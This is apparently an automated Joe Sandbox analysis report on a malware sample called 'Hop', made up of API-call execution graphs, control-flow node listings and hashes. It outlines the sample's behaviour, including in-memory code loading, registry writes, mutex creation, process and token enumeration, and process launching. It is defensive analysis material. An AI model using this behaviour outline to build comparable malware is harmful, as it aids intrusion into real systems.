                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                          • API String ID: 3561508498-410509341
                                                                                                                                                                                                                                                                                                          • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                                                                                                                                                                                                                          • Instruction ID: c27fb5380e339c275c38aaff4e325fb8d2a0cb48883f0b25a7783c3432939d58
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16D06762A19A86D5DF10EB04D8953A96371FF94318F94443AE14DC25B5DF6CDA8AC700

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:10.1%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                          Signature Coverage:21.8%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:156
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                                                                                                                                                                          execution_graph 3893 243665e1000 3894 243665e9878 3893->3894 3895 243665e98a7 3894->3895 3897 243665e973c 3894->3897 3898 243665e9756 3897->3898 3899 243665ec3fc RtlAddFunctionTable 3898->3899 3904 243665e9869 3898->3904 3900 243665e97af 3899->3900 3901 243665ec440 VirtualFree 3900->3901 3902 243665e97cf 3901->3902 3903 243665e982f SetErrorMode VirtualProtect 3902->3903 3903->3904 3904->3895 3739 243665ec54c 3740 243665ec5a8 3739->3740 3741 243665ec576 3739->3741 3741->3740 3742 243665ec59e LoadLibraryA 3741->3742 3742->3740 3743 243665e973c 3744 243665e9756 3743->3744 3750 243665e9869 3744->3750 3751 243665ec3fc 3744->3751 3746 243665e97af 3755 243665ec440 3746->3755 3748 243665e97cf 3749 243665e982f SetErrorMode VirtualProtect 3748->3749 3749->3750 3752 243665ec409 3751->3752 3754 243665ec436 3751->3754 3753 243665ec40f RtlAddFunctionTable 3752->3753 3752->3754 3753->3754 3754->3746 3758 243665ec457 3755->3758 3756 243665ec4d0 VirtualFree 3757 243665ec4e6 3756->3757 3757->3748 3758->3756 3758->3757 3759 243665e39f8 3760 243665e3a36 3759->3760 3761 243665e3b03 calloc 3760->3761 3762 243665e3b1c 3760->3762 3761->3762 3763 243665e3bc8 3764 243665e3bde 3763->3764 3766 243665e3c02 3763->3766 3765 243665e3bea lstrcmpiW 3764->3765 3765->3766 3905 243665e1005 3907 243665e98b0 3905->3907 3906 243665e98df 3907->3906 3908 243665e973c 4 API calls 3907->3908 3908->3906 3767 243665e8624 3773 243665e8663 3767->3773 3768 243665e894f 3769 243665e8764 3778 243665e87b6 3769->3778 3784 243665e7e1c 3769->3784 3770 243665e7e1c 4 API calls 3770->3769 3772 243665e879d 3793 243665e771c 3772->3793 3773->3768 3773->3769 3773->3770 3775 243665e87b2 3777 243665e87e1 3775->3777 3775->3778 3812 243665e7d0c 3775->3812 3777->3778 3780 243665e88ca 3777->3780 3781 243665e8822 3777->3781 3778->3768 3808 243665e573c 3778->3808 3816 243665e69d8 3780->3816 3797 243665e8234 3781->3797 3785 243665e7e66 3784->3785 3786 243665e7e8b RegOpenKeyExW 3785->3786 3787 243665e7eb1 RegCreateKeyExW 3786->3787 3789 243665e7ee5 3786->3789 3787->3789 3788 243665e7fc0 3788->3772 3789->3788 3790 243665e7f7d RegSetValueExW 3789->3790 3791 243665e7f10 3789->3791 3790->3791 3792 243665e7fb5 RegCloseKey 3791->3792 3792->3788 3795 243665e7792 3793->3795 3794 243665e78ab 3794->3775 3795->3794 3796 243665e7bf8 CreateMutexExW 3795->3796 3796->3794 3798 243665e8262 3797->3798 3821 243665e51bc 3798->3821 3800 243665e8272 3807 243665e85f8 3800->3807 3825 243665e64c0 3800->3825 3802 243665e8338 3803 243665e84b2 CreateFileMappingW 3802->3803 3802->3807 3804 243665e84ea MapViewOfFile 3803->3804 3803->3807 3805 243665e850e 3804->3805 3804->3807 3843 243665e9218 3805->3843 3807->3778 3809 243665e576e 3808->3809 3810 243665e577d GetSystemInfo 3809->3810 3811 243665e5792 3810->3811 3811->3768 3813 243665e7d30 3812->3813 3814 243665e4888 2 API calls 3813->3814 3815 243665e7d46 3813->3815 3814->3815 3815->3777 3817 243665e51bc malloc 3816->3817 3818 243665e6a4a 3817->3818 3819 243665e5fa0 NtQueryInformationProcess 3818->3819 3820 243665e6b01 3818->3820 3819->3820 3820->3778 3822 243665e51f7 3821->3822 3823 243665e52a9 malloc 3822->3823 3824 243665e52c0 3822->3824 3823->3824 3824->3800 3827 243665e6500 3825->3827 3826 243665e6728 3826->3802 3827->3826 3828 243665e6522 NtQuerySystemInformation 3827->3828 3829 243665e6540 3828->3829 3829->3826 3830 243665e654c NtQuerySystemInformation 3829->3830 3830->3826 3831 243665e6565 3830->3831 3855 243665e5fa0 3831->3855 3834 243665e6573 3837 243665e66b2 3834->3837 3859 243665e4888 3834->3859 3836 243665e5fa0 NtQueryInformationProcess 3836->3837 3837->3826 3837->3836 3838 243665e5fa0 NtQueryInformationProcess 3839 243665e65f4 3838->3839 3839->3826 3839->3838 3840 243665e668d CloseHandle 3839->3840 3841 243665e4888 2 API calls 3839->3841 3842 243665e664d GetTokenInformation CloseHandle 3839->3842 3840->3826 3840->3839 3841->3839 3842->3839 3842->3840 3849 243665e924e 3843->3849 3844 243665e93f6 3844->3807 3845 243665e93ed free 3845->3844 3846 243665e92fe free 3846->3845 3847 243665e9310 3846->3847 3847->3845 3865 243665e8ae0 3847->3865 3849->3844 3849->3845 3849->3846 3852 243665e93ac 3853 243665e93e5 3852->3853 3854 243665e93cf CloseHandle 3852->3854 3853->3845 3854->3853 3856 243665e5ff3 NtQueryInformationProcess 3855->3856 3858 243665e5fb5 3855->3858 3857 243665e6015 3856->3857 3857->3834 3858->3856 3858->3857 3860 243665e489f 3859->3860 3861 243665e490a 3860->3861 3862 243665e48a7 GetTokenInformation 3860->3862 3861->3837 3861->3839 3862->3861 3863 243665e48c9 3862->3863 3863->3861 3864 243665e48e6 GetTokenInformation 3863->3864 3864->3861 3866 243665e8b1a 3865->3866 3867 243665e8b26 NtQuerySystemInformation malloc 3866->3867 3868 243665e8bea 3866->3868 3867->3868 3869 243665e8b53 NtQuerySystemInformation 3867->3869 3876 243665e8c08 3868->3876 3869->3868 3870 243665e8b6b 3869->3870 3871 243665e5fa0 NtQueryInformationProcess 3870->3871 3873 243665e8b79 3871->3873 3872 243665e5fa0 NtQueryInformationProcess 3872->3873 3873->3868 3873->3872 3880 243665e5bc8 3873->3880 3885 243665e5cf4 CreateFileW 3873->3885 3877 243665e8c3a 3876->3877 3878 243665e8cb5 CreateProcessW 3877->3878 3879 243665e8cf4 3877->3879 3878->3879 3879->3852 3881 243665e5c10 GetLogicalDriveStringsW 3880->3881 3882 243665e5cd7 3880->3882 3881->3882 3883 243665e5c28 QueryDosDeviceW 3881->3883 3882->3873 3884 243665e5c4d 3883->3884 3884->3882 3884->3883 3886 243665e5ead 3885->3886 3887 243665e5d49 3885->3887 3886->3873 3887->3886 3888 243665e5d72 ReadFile 3887->3888 3888->3886 3889 243665e5d96 3888->3889 3889->3886 3890 243665e5e39 3889->3890 3891 243665e5e19 SetFilePointer 3889->3891 3890->3886 3892 243665e5e93 ReadFile 3890->3892 3891->3892 3892->3886 3909 243665e8974 3911 243665e89ad 3909->3911 3910 243665e8ad4 3911->3910 3912 243665e771c CreateMutexExW 3911->3912 3913 243665e89ee 3912->3913 3913->3910 3914 243665e69d8 2 API calls 3913->3914 3914->3910

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 00000243665E64C0 Relevance: 7.8, APIs: 5, Instructions: 253nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 71 243665e64c0-243665e6506 call 243665e9568 74 243665e6731-243665e6755 call 243665e9990 71->74 75 243665e650c-243665e6546 call 243665e9568 NtQuerySystemInformation 71->75 75->74 81 243665e654c-243665e655f NtQuerySystemInformation 75->81 82 243665e6728-243665e6729 81->82 83 243665e6565-243665e6579 call 243665e5fa0 81->83 82->74 87 243665e66b2-243665e66cc call 243665e1f94 83->87 88 243665e657f-243665e658d 83->88 94 243665e66ce-243665e66d1 87->94 92 243665e658f-243665e6594 88->92 93 243665e65d9-243665e65ee call 243665e4888 88->93 92->93 95 243665e6596-243665e659d 92->95 93->87 107 243665e65f4-243665e65f5 93->107 96 243665e671c-243665e671f 94->96 97 243665e66d3-243665e66e2 94->97 95->87 100 243665e65a3-243665e65c8 call 243665e98f4 95->100 96->82 99 243665e6721-243665e6726 96->99 97->96 106 243665e66e4-243665e66fb 97->106 99->94 100->87 111 243665e65ce-243665e65d3 100->111 106->96 112 243665e66fd-243665e6708 call 243665e5fa0 106->112 109 243665e65f7-243665e660e 107->109 116 243665e669f-243665e66a2 109->116 117 243665e6614-243665e661f call 243665e5fa0 109->117 111->87 111->93 118 243665e670e-243665e671a 112->118 119 243665e670a-243665e670b 112->119 116->82 120 243665e66a8-243665e66ad 116->120 124 243665e6621-243665e662b call 243665e4888 117->124 125 243665e668d-243665e6699 CloseHandle 117->125 118->82 118->96 119->118 120->109 124->125 128 243665e662d-243665e664b 124->128 125->82 125->116 128->125 130 243665e664d-243665e6687 GetTokenInformation CloseHandle 128->130 130->125 131 243665e6689-243665e668a 130->131 131->125
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Information$Query$CloseHandleSystem$ProcessToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2024103940-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c3f3c76c8b2be0d7d44dc3ee33c48ea8b0372aa6c5604e5390e5033e47f04c12
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7f5432ae089376d545c0bb39bc769949c1f67937a1240733ef525327dee971b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f3c76c8b2be0d7d44dc3ee33c48ea8b0372aa6c5604e5390e5033e47f04c12
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B371FA30318B069FEF54EB65985A76E73DAFBA47C0F410029E647C3191EE34D9018B8A
                                                                                                                                                                                                                                                                                                          Function 00000243665E8AE0 Relevance: 4.6, APIs: 3, Instructions: 137nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationQuery$System$Processmalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1267391693-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0766fc6635dd31053b727816442fefa633829422fb4b59d36c68c8cec887e78a
                                                                                                                                                                                                                                                                                                          • Instruction ID: b60532c730a992fec56e56249714280365557339cf9f0a7311772b69e71c6f71
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0766fc6635dd31053b727816442fefa633829422fb4b59d36c68c8cec887e78a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3331A871708A096FEF58F76C9C5A77D32CEE7A5751F010029DA4AC3192EE24DD02868E
                                                                                                                                                                                                                                                                                                          Function 00000243665E5BC8 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 431 243665e5bc8-243665e5c0a 432 243665e5c10-243665e5c22 GetLogicalDriveStringsW 431->432 433 243665e5cd7-243665e5cf1 call 243665e9990 431->433 432->433 434 243665e5c28-243665e5c4b QueryDosDeviceW 432->434 436 243665e5c4d-243665e5c60 434->436 437 243665e5cbe-243665e5cc8 434->437 436->437 442 243665e5c62-243665e5c7a 436->442 437->437 439 243665e5cca-243665e5ccc 437->439 439->433 440 243665e5cce-243665e5cd1 439->440 440->433 440->434 444 243665e5cbc 442->444 445 243665e5c7c-243665e5c84 442->445 444->437 445->444 446 243665e5c86-243665e5cba 445->446 446->437
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DeviceDriveLogicalQueryStrings
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3173366581-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 44ebf3bb3f659db2baf1671957d6035b84d40f7447c0330e21c1dfb288bbfcca
                                                                                                                                                                                                                                                                                                          • Instruction ID: edae4f945438580daf39f251a52daab0be4b146f75d9359b5a4a358de4256909
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ebf3bb3f659db2baf1671957d6035b84d40f7447c0330e21c1dfb288bbfcca
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431E731618A498BEF60DB14D8997AA73E6FBA4740F01051AE54EC3180EB79DE40CB8A
                                                                                                                                                                                                                                                                                                          Function 00000243665E51BC Relevance: 1.6, APIs: 1, Instructions: 310COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 495 243665e51bc-243665e51f5 496 243665e5201-243665e520a 495->496 497 243665e51f7-243665e51ff 495->497 498 243665e520c-243665e5214 496->498 499 243665e5216-243665e521a 496->499 497->496 498->499 500 243665e521c-243665e5224 499->500 501 243665e5226-243665e523e 499->501 500->501 502 243665e5240-243665e5248 501->502 503 243665e524a-243665e524d 501->503 502->503 504 243665e524f-243665e5257 503->504 505 243665e5259-243665e525c 503->505 504->505 506 243665e525e-243665e5266 505->506 507 243665e5268-243665e5276 505->507 506->507 508 243665e527c-243665e5296 call 243665e1030 507->508 509 243665e5475 507->509 508->509 513 243665e529c-243665e52a3 508->513 511 243665e5477-243665e5487 509->511 513->509 514 243665e52a9-243665e52ba malloc 513->514 514->509 515 243665e52c0-243665e52f8 call 243665e50cc 514->515 519 243665e52fe-243665e532a call 243665e98f4 515->519 520 243665e546c-243665e546d 515->520 523 243665e532c-243665e5334 519->523 520->509 524 243665e533f-243665e5345 523->524 525 243665e5336-243665e533d 523->525 526 243665e5347-243665e5355 524->526 525->526 526->523 527 243665e5357-243665e53c6 call 243665e38c0 526->527 530 243665e53cc-243665e53d7 527->530 531 243665e5463-243665e5464 527->531 532 243665e53d9-243665e5409 530->532 531->520 534 243665e540b-243665e5417 532->534 534->532 535 243665e5419-243665e5420 534->535 536 243665e5422-243665e5423 535->536 537 243665e545c-243665e5461 535->537 538 243665e5425-243665e542c 536->538 537->511 539 243665e544f-243665e545a 538->539 540 243665e542e-243665e5432 538->540 539->537 539->538 541 243665e5434-243665e543e 540->541 542 243665e5440 541->542 543 243665e5445-243665e544d 541->543 542->543 543->539 543->541
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction ID: 481c7088833f45280c688636c330fce74a553f14e5d3a2170b69e0349a9e7a2a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2918A316085494BEB6CDF28CC8A3BD77D6F795345F15412EE5CBC2282E935C6078B89
                                                                                                                                                                                                                                                                                                          Function 00000243665E5FA0 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1778838933-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aedaa32b066cd7baad790dc79b89f0f0aa25ff69fa0ea66035def9c6c87aec9e
                                                                                                                                                                                                                                                                                                          • Instruction ID: fcf8b2b4877b0f307e71840c2bd57dfcad1b4985a1c368ef56dec8facda9ac14
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aedaa32b066cd7baad790dc79b89f0f0aa25ff69fa0ea66035def9c6c87aec9e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91018830228B0A5FEF45EB789895B6A73E9F764340F400519D65AC3191EF39C601CB49
                                                                                                                                                                                                                                                                                                          Function 00000243665E5CF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 212fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Read$CreatePointer
                                                                                                                                                                                                                                                                                                          • String ID: MZ$PE
                                                                                                                                                                                                                                                                                                          • API String ID: 4132024448-1102611028
                                                                                                                                                                                                                                                                                                          • Opcode ID: ed02993aad010b8f0ed0d0dc1b69872bc261ae90b3cbae546a6cddcfd68a01dd
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3702c5aa0f51cb96d50df42863d8cc7f17c9c6e419ec9105cc7049a1effec561
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed02993aad010b8f0ed0d0dc1b69872bc261ae90b3cbae546a6cddcfd68a01dd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7614530618A094FEF74EB18989A36D77D6E7A4740F114619E99EC3185CB3CDE418F8A
                                                                                                                                                                                                                                                                                                          Function 00000243665E7E1C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateOpenValue
                                                                                                                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                                                                                                                          • API String ID: 776291540-149943524
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62d38529be31c1c4406cadae21aaf7dda888b7df0d9feabcaf499976726d02fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: f7199981e45181da3f18a52f328ee0be9b99662371a9464f4035dcc05ac1d668
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d38529be31c1c4406cadae21aaf7dda888b7df0d9feabcaf499976726d02fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D651C531208B0C4FDB54EF68988A6AFB3D6F794341F414A2EE58BC3251DF74D9458B8A
                                                                                                                                                                                                                                                                                                          Function 00000243665E9218 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free$CloseHandle
                                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                                          • API String ID: 4080011421-3772416878
                                                                                                                                                                                                                                                                                                          • Opcode ID: 19bd0e1f4c380038fc96e62ce33c6398c15e8ead9e9bc0b200304ba1120fbf6f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b13acbbe4498525367edec9f89b4ebb39cae193e052b0415382d7a022dbb3ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19bd0e1f4c380038fc96e62ce33c6398c15e8ead9e9bc0b200304ba1120fbf6f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7051D93060CB095FEF54EB68D88A7AEB3E6FB98750F01451DE58AC3281DE74D941CB89
                                                                                                                                                                                                                                                                                                          Function 00000243665E573C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 168 243665e573c-243665e578d call 243665e98f4 GetSystemInfo 172 243665e5819-243665e581e 168->172 173 243665e5792-243665e57b5 call 243665e98f4 172->173 174 243665e5824-243665e5831 172->174 178 243665e57c0-243665e57c8 173->178 179 243665e57b7-243665e57be 173->179 180 243665e580c-243665e580d 178->180 181 243665e57ca-243665e57d2 178->181 179->172 182 243665e5811-243665e5817 180->182 181->180 183 243665e57d4-243665e57d9 181->183 182->172 183->180 184 243665e57db-243665e57e8 183->184 185 243665e57ea-243665e57ed 184->185 186 243665e57f8-243665e57fb 184->186 185->186 188 243665e57ef-243665e57f6 185->188 186->182 187 243665e57fd-243665e5808 186->187 187->180 188->182 188->186
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 31276548-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: a88bb02aead4fe52cd93ba064d7017a54b9761c38897babe54b5f79178871d7e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 942627332124d53aa7bbbd99a90ddecaabd2a27d19a30d52cc9ab57b0202ddb5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a88bb02aead4fe52cd93ba064d7017a54b9761c38897babe54b5f79178871d7e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F831C53021CF0D9BEF54EB18D88A76EB3D6F7A4780F514629E14AC3180DA65DD458B8A
                                                                                                                                                                                                                                                                                                          Function 00000243665E39F8 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 2635317215-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9e579be77159963f23b7a6aee61d5d767583c1faaf223818a1d0d66f61b70a4e
                                                                                                                                                                                                                                                                                                          • Instruction ID: a39cef0b18fd2e51d98a052315145099addedb862ed612980a950cb97897b731
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e579be77159963f23b7a6aee61d5d767583c1faaf223818a1d0d66f61b70a4e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A51C231618E094FEB94EB28D44E7AE77DAFBA4340F11416ED54AC32A2EF34C9458B85
                                                                                                                                                                                                                                                                                                          Function 00000243665E771C Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 371COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
